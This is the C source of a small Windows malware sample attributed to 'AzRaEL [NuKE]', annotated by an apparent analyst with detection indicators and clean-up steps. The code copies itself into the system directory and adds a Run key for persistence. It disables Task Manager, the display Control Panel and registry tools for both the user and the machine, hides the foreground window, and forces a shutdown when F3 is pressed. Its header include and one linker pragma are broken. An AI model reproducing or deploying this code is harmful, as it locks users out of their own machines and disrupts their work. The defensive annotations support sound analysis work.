/*
 * NOTE(review): the header name after this #include is missing from the
 * listing, most likely dropped when the page was extracted. The Win32 calls
 * below need declarations that are not visible here.
 */
#include
/*
 * AzRaEL [NuKE] ejecutable code
 * ejcutable.c - funny module
 *
 * This program is private version, for anti-educational purposes and without any
 * explicit or implicit warranty; in no event shall the author or
 * contributors be liable for any direct, indirect or incidental damages
 * arising in any way out of the use of this module.
 *
 * NuKE reserves all rigths about the ejecutable source code xD,
 * This source is a special gift to antrax, "the ejecutable", the source
 * contain malware code and maybe result molest and arising for windows users.
 * I hope antrax don't stolen (usually do) this source also :p
 *
 * Thanks to: sowher, darkiker, /migue, billy idol, ednux, mickey mouse, abstracto, gargamel ....
 */

/*
 * Analyst summary (derived only from the code below):
 *   - copies its own image to <system directory>\ejecutable.exe;
 *   - registers that path under the HKLM ...\CurrentVersion\run key as the
 *     value "Ejecutable" (logon persistence);
 *   - sets DisableTaskMgr, NoDispCPL and DisableRegistryTools to 1 under the
 *     Policies\System key of both HKCU and HKLM;
 *   - hides whichever window is in the foreground at start-up;
 *   - polls the F3 key once per second and, when it is seen, runs a forced
 *     shutdown with a 12-second timeout.
 * The file name, the Run value name, the three policy values and the
 * shutdown command line are the host indicators for detection and clean-up.
 */

#define TRUE 1
#define FALSE 0

/*
 * The PKILL and STATUS_* macros below are not referenced by any code visible
 * in this listing; they look like leftovers from another header (unconfirmed).
 */
#define _PKILL2_
#define PKILL_VERSION "1.0.0.1"

#ifndef STATUS_PASSIVE_LEVEL_REQUIRED
#define STATUS_PASSIVE_LEVEL_REQUIRED 0xC00F00A0
#define STATUS_NTOSKRNL_NOT_FOUND 0xC00F00B1
#define STATUS_MAP_IMAGE_FAILED 0xC00F00C2
#define STATUS_ADD_FUNCTION_FAILED 0xC00F00D3
#define STATUS_COVERAGE_ERROR 0xC00F00E4
#define STATUS_CODE_REBUILDING_FAILED 0xC00F00F5
#endif

#define STATUS_ALREADY_STARTED 0xC00F1000
#define STATUS_UNSUPPORTED_OS 0xC00F1001

//typedef
//BOOLEAN
//(__stdcall *ISPROCESSHIDDEN_CALLBACK)(
// PEPROCESS Process
//);

#ifdef __cplusplus
extern "C" {
#endif

#ifdef __cplusplus
}
#endif

/* Path of the running image, filled in by GetModuleFileName in WinMain. */
char PathName[256];
/* Windows directory; written in WinMain and not read again in this listing. */
char WinDir[256];
/* System directory; copiar() appends the drop file name to it in place. */
char SysDir[256];
/* DWORD payload (1 = policy enabled) written for every policy value in registro(). */
int data = 1;

/*
 * Posts WM_QUIT to the window titled "Mi PC" and then starts a forced
 * system shutdown.
 *
 * The loop repeats FindWindow + PostMessage with no delay until PostMessage
 * reports success. "Mi PC" is presumably the Spanish-locale "My Computer"
 * window title (not confirmed by the listing). `i` is declared but unused.
 *
 * Detection: system() starts the command interpreter, so process-creation
 * telemetry shows a shutdown command line carrying -s -f -t 12 and the
 * comment string below. A pending shutdown can be cancelled with
 * `shutdown -a` while the 12-second timer is still running.
 */
void closeThread()
{
    HWND cFile;
    int i, flag=1;
    char WindowsClose[] = {"Mi PC"};
    do{
        cFile = FindWindow(0,WindowsClose);
        if (PostMessage(cFile, WM_QUIT, 0, 0 ))
            flag = FALSE;
    }while(flag);
    /* -s shut down, -f force applications closed, -t 12 timeout in seconds, -c comment */
    system("shutdown -s -f -t 12 -c \"The ejecutable has you\"");
}

/*
 * Copies the running image (PathName) to <SysDir>\ejecutable.exe.
 *
 * SysDir is modified in place, so after this call it holds the full path of
 * the dropped copy; registro() depends on that. The third CopyFile argument
 * is 0, so an existing file of that name is overwritten. The return value is
 * not checked.
 *
 * Detection: creation of ejecutable.exe in the system directory by a process
 * running from another location. Under default permissions that directory is
 * not writable by a standard user, so least-privilege accounts blunt this step.
 */
void copiar()
{
    strcat(SysDir,"\\ejecutable.exe");
    CopyFile(PathName,SysDir,0);
}

/*
 * Writes the persistence entry and the lock-down policy values.
 *
 * Values written (all return codes are ignored):
 *   HKLM\Software\Microsoft\Windows\CurrentVersion\run
 *       "Ejecutable" (REG_SZ) = contents of SysDir
 *   HKCU and HKLM \Software\Microsoft\Windows\CurrentVersion\Policies\System
 *       "DisableTaskMgr"       (REG_DWORD) = 1
 *       "NoDispCPL"            (REG_DWORD) = 1
 *       "DisableRegistryTools" (REG_DWORD) = 1
 *
 * The Run value is written with a length of sizeof(SysDir), i.e. the whole
 * 256-byte buffer rather than the string length, which gives the stored value
 * a fixed, padded size that can serve as a forensic trait.
 *
 * Defender notes: registry-value-set auditing on the Run key and on
 * Policies\System covers every write made here. HKLM writes need
 * administrative rights under default ACLs, so on a non-elevated account only
 * the HKCU values are expected to land. Clean-up means removing the
 * "Ejecutable" Run value, deleting or zeroing the three policy values in both
 * hives, and deleting the dropped file.
 */
void registro()
{
    HKEY hkey;

    /* Logon persistence: Run value pointing at the dropped copy. */
    RegOpenKeyEx(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\run",0,KEY_SET_VALUE,&hkey);
    RegSetValueEx(hkey,"Ejecutable",0,REG_SZ,(const unsigned char*)SysDir,sizeof(SysDir));
    RegCloseKey(hkey);

    /* Task Manager disabled, per user and machine wide. */
    RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"DisableTaskMgr",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);
    RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"DisableTaskMgr",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);

    /* Per-user: NoDispCPL and DisableRegistryTools. */
    RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"NoDispCPL",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);
    RegCreateKey(HKEY_CURRENT_USER,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"DisableRegistryTools",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);

    /* Machine wide: the same two values. */
    RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"NoDispCPL",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);
    RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\System",&hkey);
    RegSetValueEx(hkey,"DisableRegistryTools",0,REG_DWORD,(const unsigned char*)&data,sizeof(data));
    RegCloseKey(hkey);
}

/*
 * Entry point: resolves paths, hides the foreground window, drops the copy,
 * writes the registry values, then polls for F3 indefinitely.
 *
 * None of the four WinMain parameters is used. nRet is assigned but never
 * read. The window that gets hidden is whatever GetForegroundWindow returns
 * at that moment, which is not necessarily a window owned by this process.
 * The polling loop never exits, so `return 0` is unreachable.
 *
 * Detection: a windowless process that wakes once per second and calls
 * GetAsyncKeyState is visible to API-level behavioural monitoring; together
 * with the file and registry writes above it gives a compact behaviour
 * profile for this sample.
 */
int WINAPI WinMain( HINSTANCE hThisInstance, HINSTANCE hPrevInstance, LPSTR ipszArgument, int nFunsterStil )
{
    GetWindowsDirectory(WinDir,sizeof(WinDir));
    GetSystemDirectory(SysDir,sizeof(SysDir));
    HMODULE hMe = GetModuleHandle(NULL);
    DWORD nRet = GetModuleFileName(hMe,PathName,256);
    HWND hVOculta = GetForegroundWindow();
    ShowWindow(hVOculta,SW_HIDE);
    copiar();
    registro();
    do{
        /* Any non-zero key state for F3 triggers the shutdown routine. */
        if (GetAsyncKeyState(VK_F3))
            closeThread();
        Sleep(1000);
    }while(1);
    return 0;
}

/*
 * Linker directives. Two different /ENTRY values are requested, and the
 * /SUBSYSTEM pragma has no closing parenthesis in the listing; which setting
 * a given toolchain applies cannot be determined from here.
 * The /MERGE directives ask for .rdata and .text to be folded into .data.
 * If honoured, the resulting PE carries its code in a section named .data,
 * a layout anomaly that static triage can flag. /IGNORE:4078 presumably
 * silences the linker warning that merge produces (TODO confirm).
 */
#pragma comment(linker,"/ENTRY:main")
#pragma comment(linker,"/MERGE:.rdata=.data")
#pragma comment(linker,"/MERGE:.text=.data")
#pragma comment( linker, "/SUBSYSTEM:WINDOWS /ENTRY:mainCRTStartup"
#pragma comment(lib,"msvcrt.lib")
#if (_MSC_VER < 1300)
#pragma comment(linker,"/IGNORE:4078")
#pragma comment(linker,"/OPT:NOWIN98")
#endif
/* Defined after all code in this listing, so it affects nothing visible here. */
#define WIN32_LEAN_AND_MEAN